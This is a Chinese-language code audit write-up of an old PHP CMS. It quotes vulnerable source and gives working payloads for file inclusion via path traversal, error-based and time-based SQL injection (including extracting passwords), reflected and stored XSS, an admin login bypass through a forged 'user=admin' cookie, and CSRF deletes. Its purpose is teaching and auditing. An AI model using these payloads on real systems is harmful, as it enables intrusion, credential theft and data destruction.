某cms代码审计

某cms代码审计
2022-7-27 18:45:17 Author: xz.aliyun.com(查看原文) 阅读量:35 收藏

目录结构

admin         --管理后台文件夹
css           --存放css的文件夹
files         --存放页面的文件夹
images        --存放图片的文件夹
inc           --存放网站配置文件的文件夹
install       --网站进行安装的文件夹
seacmseditor  --编辑器文件夹
template      --模板文件夹
upload        --上传功能文件夹
index.php     --网站首页

文件包含漏洞

index.php

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file = addslashes($_GET['r']); //接收文件名
$action = $file == '' ? 'index' : $file; //判断为空或者等于index
include('files/' . $action . '.php'); //载入相应文件

GET传值r，用函数addslashes转义我们传入的值，防止命令执行、sql注入等，但是这里对文件包含并没有影响

存在目录穿越，可以包含file目录中的也可以包含根目录中的文件

我们在files文件夹下新建一个2.php 根目录新建1.php

payload:
?r=2 //包含files文件夹下的phpinfo()
?r=../1  //包含根目录的phpinfo（）

第二处admin的index.php也是存在同样问题

SQL注入漏洞

admin/login.php

<?php
ob_start();
require '../inc/conn.php';
$login = $_POST['login'];
$user = $_POST['user'];
$password = $_POST['password'];
$checkbox = $_POST['checkbox'];

if ($login <> "") {
    $query = "SELECT * FROM manage WHERE user='$user'";
    echo $query;
    $result = mysql_query($query) or die('SQL语句有误：' . mysql_error());
    $users = mysql_fetch_array($result);

    if (!mysql_num_rows($result)) {
        echo "<Script language=JavaScript>alert('抱歉，用户名或者密码错误。');history.back();</Script>";
        exit;
    } else {
        $passwords = $users['password'];
        if (md5($password) <> $passwords) {
            echo "<Script language=JavaScript>alert('抱歉，用户名或者密码错误。');history.back();</Script>";
            exit;
        }
//写入登录信息并记住30天
        if ($checkbox == 1) {
            setcookie('user', $user, time() + 3600 * 24 * 30, '/');
        } else {
            setcookie('user', $user, 0, '/');
        }
        echo "<script>this.location='?r=index'</script>";
        exit;
    }
    exit;
    ob_end_flush();
}
?>

没有对参数进行过滤

SQLmap一把梭

手注：

报错注入

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ //yong

' and updatexml(1,concat(0x7e,(select group_concat() from information_schema.tables where table_schema='www_xh_com' limit 0,1),0x7e),1)--+ //表名

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit 0,1),0x7e),1)--+

' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+

时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

admin/softlist.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen = 'class="open"';
$pageyema = "?r=wzlist&page=";

$delete = $_GET['delete'];
if ($delete <> "") {
    $query = "DELETE FROM download WHERE id='$delete'";
    $result = mysql_query($query) or die('SQL语句有误：' . mysql_error());
    echo "<script>alert('亲，ID为" . $delete . "的内容已经成功删除！');location.href='?r=softlist'</script>";
    exit;
}
?>

无过滤，开启了mysql错误回显，直接报错注入

http://www.xh.com/admin/?r=softlist&delete=' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

执行结果:

admin/editlink.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$linklistopen = 'class="open"';
$id = $_GET['id'];
$query = "SELECT * FROM link WHERE id='$id'";
echo $query;
$resul = mysql_query($query) or die('SQL语句有误：' . mysql_error());
$link = mysql_fetch_array($resul);

无过滤，报错注入，时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/editcolumn.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$columnopen = 'class="open"';
$id = $_GET['id'];
$type = $_GET['type'];
if ($type == 1) {
    $query = "SELECT * FROM nav WHERE id='$id'";
    echo $query;
    $resul = mysql_query($query) or die('SQL语句有误：' . mysql_error());
    $nav = mysql_fetch_array($resul);
}
if ($type == 2) {
    $query = "SELECT * FROM navclass WHERE id='$id'";
    $resul = mysql_query($query) or die('SQL语句有误：' . mysql_error());
    $nav = mysql_fetch_array($resul);
}

无过滤，报错注入，时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/editsoft.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$wzlistopen='class="open"';
$id=$_GET['id'];
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误：'.mysql_error());
$download = mysql_fetch_array($resul);

无过滤，报错注入，时间盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

admin/columnlist.php

<?php
require '../inc/checklogin.php';
require '../inc/conn.php';
$columnlistopen = 'class="open"';

$delete = $_GET['delete'];

$delete2 = $_GET['delete2'];

if ($delete <> "") {
    $query = "DELETE FROM nav WHERE id='$delete'";
    $result = mysql_query($query) or die('SQL语句有误：' . mysql_error());
    echo "<script>alert('亲，ID为" . $delete . "的栏目已经成功删除！');location.href='?r=columnlist'</script>";
    exit;
}
if ($delete2 <> "") {
    $query = "DELETE FROM navclass WHERE id='$delete2'";
    $result = mysql_query($query) or die('SQL语句有误：' . mysql_error());
    echo "<script>alert('亲，ID为" . $delete2 . "的二级栏目已经成功删除！');location.href='?r=columnlist'</script>";
    exit;
}
?>

无过滤，开启mysql错误显示，时间盲注，报错注入，布尔盲注

' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

这样类似的漏洞还有很多，毕竟这个cms很老了，而且还是一个人开发的

前台

file/software.php

<?php
require 'inc/conn.php';
require 'inc/time.class.php';
$query = "SELECT * FROM settings";
$resul = mysql_query($query) or die('SQL语句有误：' . mysql_error());
$info = mysql_fetch_array($resul);
$id = addslashes($_GET['cid']);
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误：' . mysql_error());
$download = mysql_fetch_array($resul);
//浏览计数
$query = "UPDATE download SET hit = hit+1 WHERE id=$id";
echo $query;
@mysql_query($query) or die('修改错误：' . mysql_error());

?>

直接将值带入到sql语句中，就不需要闭合，也就不会触发addslashes函数

XSS漏洞

反射性

file/contact.php

$page = addslashes($_GET['page']);
if ($page <> "") {
    if ($page <> 1) {
        $pages = "第" . $page . "页 - ";
    }
}

<?php echo $page ?>

addslashes函数对js标签并不过滤

http://www.xh.com/?r=contact&page=<script>alert(1)</script>
http://www.xh.com/?r=contact&page=<img src=1 onerror=alert(/xss/)>

存储型

admin/file/mangeinfo.php

$save=$_POST['save'];

$user=$_POST['user'];
$name=$_POST['name'];
$password=$_POST['password'];
$password2=$_POST['password2'];
$img=$_POST['img'];
$mail=$_POST['mail'];
$qq=$_POST['qq'];

if ($save==1){

if ($user==""){
echo "<script>alert('抱歉，帐号不能为空。');history.back()</script>";
exit;
    }

if ($name==""){
echo "<script>alert('抱歉，名称不能为空。');history.back()</script>";
exit;
    }
if ($password<>$password2){
echo "<script>alert('抱歉，两次密码输入不一致！');history.back()</script>";
exit;
    }

//处理图片上传
if(!empty($_FILES['images']['tmp_name'])){
$query = "SELECT * FROM imageset";
$result = mysql_query($query) or die('SQL语句有误：'.mysql_error());
$imageset = mysql_fetch_array($result);
include '../inc/up.class.php';
if (empty($HTTP_POST_FILES['images']['tmp_name']))//判断接收数据是否为空
{
        $tmp = new FileUpload_Single;
        $upload="../upload/touxiang";//图片上传的目录，这里是当前目录下的upload目录，可自已修改
        $tmp -> accessPath =$upload;
        if ( $tmp -> TODO() )
        {
            $filename=$tmp -> newFileName;//生成的文件名
            $filename=$upload.'/'.$filename;
            $imgsms="及图片";

        }       
}
}

if ($filename<>""){
$images="img='$filename',"; 
}

if ($password<>""){
$password=md5($password);
$password="password='$password',";
}

$query = "UPDATE manage SET 
user='$user',
name='$name',
$password
$images
mail='$mail',
qq='$qq',
date=now()";
@mysql_query($query) or die('修改错误：'.mysql_error());
echo "<script>alert('亲爱的，资料".$imgsms."设置已成功更新！');location.href='?r=manageinfo'</script>"; 
exit;
}
?>

POST传参，但是无任何过滤，直接根数据库进行交互，存在存储型XSS

payload:

<img src=1 onerror=alert(/xss/)>

垂直越权

inc/checklogin.php

<?php
$user=$_COOKIE['user'];
if ($user==""){
header("Location: ?r=login");
exit;   
}
?>

POST /admin/?r=login HTTP/1.1
Host: www.xh.com
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xh.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xh.com/admin/?r=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=moiv7ip0kf500du1luv2ccr333; name=dasd; mail=dasd;user=admin
Connection: close

user=&password=&login=yes

在cookie中添加一个新的属性：user=admin

CSRF漏洞

/admin/files/wzlist.php

$delete=$_GET['delete'];
if ($delete<>""){
$query = "DELETE FROM content WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误：'.mysql_error());
echo "<script>alert('亲，ID为".$delete."的内容已经成功删除！');location.href='?r=wzlist'</script>";
exit;

在内容管理→文章列表删除文章，点击删除抓包，得到url：

www.xh.com/admin/?r=wzlist&delete=18

抓包，在cookie处，添加一个新的属性：user=admin，更改delete的值就可以实现csrf

文章来源: https://xz.aliyun.com/t/11574
如有侵权请联系:admin#unsafe.sh